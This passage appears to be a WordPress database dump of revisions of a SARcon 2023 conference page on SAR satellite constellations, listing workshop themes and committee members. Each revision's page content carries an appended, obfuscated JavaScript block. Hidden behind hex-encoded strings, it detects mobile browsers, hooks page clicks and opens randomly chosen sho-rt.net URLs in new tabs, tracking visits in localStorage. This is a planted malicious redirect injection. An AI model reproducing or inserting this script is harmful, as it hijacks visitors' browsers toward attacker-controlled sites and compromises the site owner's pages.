|\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 16:37:06','2022-10-13 16:37:06','',2736,'https://gsw2023.com/?p=2740',0,'revision','',0),
(2741,1,'2022-10-13 16:39:41','2022-10-13 16:39:41','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 16:39:41','2022-10-13 16:39:41','',2736,'https://gsw2023.com/?p=2741',0,'revision','',0),
(2742,1,'2022-10-13 16:44:03','2022-10-13 16:44:03','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 